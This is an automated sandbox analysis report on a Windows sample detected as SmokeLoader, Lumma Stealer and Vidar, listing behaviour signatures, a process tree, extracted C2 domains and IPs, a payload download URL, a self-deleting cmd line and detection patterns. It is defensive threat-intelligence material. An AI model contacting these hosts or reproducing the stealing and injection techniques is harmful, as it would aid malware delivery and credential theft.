Windows Analysis Report
4.exe

Overview

General Information

Sample name:4.exe
Analysis ID:1447651
MD5:73ddf9a7f42e0452b6aa00f4e0a0afd5
SHA1:79ea2d473e72751803c9650ae5c6b144a0aa4879
SHA256:c166b490846d441400727765dd668262087642bae1bbfd7aaf7a1bed5aa35b62
Tags:exe
Infos:

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens network shares
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • 4.exe (PID: 6960 cmdline: "C:\Users\user\Desktop\4.exe" MD5: 73DDF9A7F42E0452B6AA00F4E0A0AFD5)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • F441.exe (PID: 3192 cmdline: C:\Users\user\AppData\Local\Temp\F441.exe MD5: EA9DD1EAE2E521666D3F06382104EC10)
        • WerFault.exe (PID: 7056 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 1640 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • 9EDA.exe (PID: 2124 cmdline: C:\Users\user\AppData\Local\Temp\9EDA.exe MD5: 7BDE08F5DD2A433DAE25A8F8B3E70970)
        • kat796E.tmp (PID: 6620 cmdline: C:\Users\user\AppData\Local\Temp\kat796E.tmp MD5: 66064DBDB70A5EB15EBF3BF65ABA254B)
          • cmd.exe (PID: 4144 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 5292 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • sdveeeu (PID: 1196 cmdline: C:\Users\user\AppData\Roaming\sdveeeu MD5: 73DDF9A7F42E0452B6AA00F4E0A0AFD5)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}
{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
{"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
Source: sslproxydump.pcap, Rule: JoeSecurity_LummaCStealer_3, Description: Yara detected LummaC Stealer, Author: Joe Security
Source: sslproxydump.pcap, Rule: JoeSecurity_Vidar_2, Description: Yara detected Vidar, Author: Joe Security

Source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Author: Joe Security
Source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Author: unknown
  • 0x264:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Source: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Author: unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Author: Joe Security
Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Author: unknown
  • 0x664:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0

Source: 8.2.9EDA.exe.44d0000.2.raw.unpack, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: 8.2.9EDA.exe.44d0000.2.raw.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
  • 0x221f0:$s1: JohnDoe
  • 0x221e8:$s2: HAL9TH
Source: 8.2.9EDA.exe.4490000.1.raw.unpack, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: 8.2.9EDA.exe.4490000.1.raw.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
  • 0x20df0:$s1: JohnDoe
  • 0x20de8:$s2: HAL9TH
Source: 8.2.9EDA.exe.4267719.0.raw.unpack, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security

                System Summary

Source: Process started, Author: Max Altgelt (Nextron Systems), Data: Command: C:\Users\user\AppData\Roaming\sdveeeu, CommandLine: C:\Users\user\AppData\Roaming\sdveeeu, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\sdveeeu, NewProcessName: C:\Users\user\AppData\Roaming\sdveeeu, OriginalFileName: C:\Users\user\AppData\Roaming\sdveeeu, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\sdveeeu, ProcessId: 1196, ProcessName: sdveeeu
                Timestamp:05/26/24-10:22:33.956954
                SID:2052787
                Source Port:52163
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:58.715000
                SID:2039103
                Source Port:52746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:39.806023
                SID:2039103
                Source Port:52743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:25.599878
                SID:2039103
                Source Port:49738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:24:23.638002
                SID:2039103
                Source Port:52694
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:03.657070
                SID:2039103
                Source Port:52737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:30.290385
                SID:2039103
                Source Port:49741
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:24:41.911621
                SID:2039103
                Source Port:52697
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:33.788541
                SID:2039103
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:59.723663
                SID:2039103
                Source Port:52656
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:24:47.097794
                SID:2039103
                Source Port:52698
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:24:28.877506
                SID:2039103
                Source Port:52695
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:22.040106
                SID:2039103
                Source Port:52740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:36.018013
                SID:2039103
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:23:03.796266
                SID:2039103
                Source Port:52658
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:24:58.756614
                SID:2039103
                Source Port:52736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:24:36.577364
                SID:2039103
                Source Port:52696
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:58.584278
                SID:2039103
                Source Port:52655
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:16.590426
                SID:2039103
                Source Port:52739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:23.170190
                SID:2039103
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:52.705023
                SID:2039103
                Source Port:52745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:26.743766
                SID:2039103
                Source Port:49739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:24:18.309650
                SID:2039103
                Source Port:52693
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:34.563116
                SID:2039103
                Source Port:52742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:11.186455
                SID:2039103
                Source Port:52738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:28.089697
                SID:2039103
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:29.338724
                SID:2039103
                Source Port:52741
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:32.694240
                SID:2039103
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:34.953458
                SID:2039103
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:47.428708
                SID:2039103
                Source Port:52744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:24.295939
                SID:2039103
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                AV Detection

Source: 4.exe, Avira: detected
Source: whispedwoodmoodsksl.shop, Avira URL Cloud: Label: malware
Source: http://45.129.96.86/file/update.exe, Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/l, Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/aFX, Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/B9E, Avira URL Cloud: Label: malware
Source: holicisticscrarws.shop, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\sdveeeu, Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\Temp\F441.exe, Avira: detection malicious, Label: TR/AVI.AceCrypter.javlp
                Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
                Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
                Source: F441.exe.3192.6.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}
Source: whispedwoodmoodsksl.shop, Virustotal: Detection: 17%
Source: dbfhns.in, Virustotal: Detection: 5%
Source: http://guteyr.cc/tmp/index.php, Virustotal: Detection: 12%
Source: https://65.109.242.59/f, Virustotal: Detection: 12%
Source: http://45.129.96.86/file/update.exe, Virustotal: Detection: 20%
Source: https://65.109.242.59, Virustotal: Detection: 7%
Source: C:\Users\user\AppData\Local\Temp\F441.exe, ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\sdveeeu, ReversingLabs: Detection: 39%
Source: 4.exe, ReversingLabs: Detection: 39%
Source: 4.exe, Virustotal: Detection: 45%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\sdveeeuJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\F441.exeJoe Sandbox ML: detected
                Source: 4.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_0041537E CryptUnprotectData,6_2_0041537E
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFFA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,9_2_6CFFA9A0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFF44C0 PK11_PubEncrypt,9_2_6CFF44C0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0425B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,9_2_6D0425B0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFF4440 PK11_PrivDecrypt,9_2_6CFF4440
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFC4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,9_2_6CFC4420
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFDE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,9_2_6CFDE6E0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D01A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,9_2_6D01A730
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFD8670 PK11_ExportEncryptedPrivKeyInfo,9_2_6CFD8670
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFFA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,9_2_6CFFA650
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D020180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,9_2_6D020180
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFF43B0 PK11_PubEncryptPKCS1,PR_SetError,9_2_6CFF43B0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D01BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,9_2_6D01BD30
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D017C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,9_2_6D017C00
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFD7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,9_2_6CFD7D60
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFF3FF0 PK11_PrivDecryptPKCS1,9_2_6CFF3FF0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D019EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,9_2_6D019EC0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFF3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,9_2_6CFF3850
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFF9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,9_2_6CFF9840
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D01DA40 SEC_PKCS7ContentIsEncrypted,9_2_6D01DA40
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D027410 NSS_SecureMemcmp,PR_SetError,PK11_Decrypt,9_2_6D027410

                Compliance

Source: C:\Users\user\AppData\Local\Temp\F441.exe, Unpacked PE file: 6.2.F441.exe.400000.0.unpack
Source: 4.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\4.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52653 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52659 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:52660 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52661 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:52662 version: TLS 1.2
                Source: Binary string: mozglue.pdbP source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
                Source: Binary string: freebl3.pdb source: freebl3.dll.9.dr
                Source: Binary string: freebl3.pdbp source: freebl3.dll.9.dr
                Source: Binary string: nss3.pdb@ source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
                Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.9.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
                Source: Binary string: nss3.pdb source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
                Source: Binary string: mozglue.pdb source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr
                Source: Binary string: softokn3.pdb source: softokn3[1].dll.9.dr
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                Networking

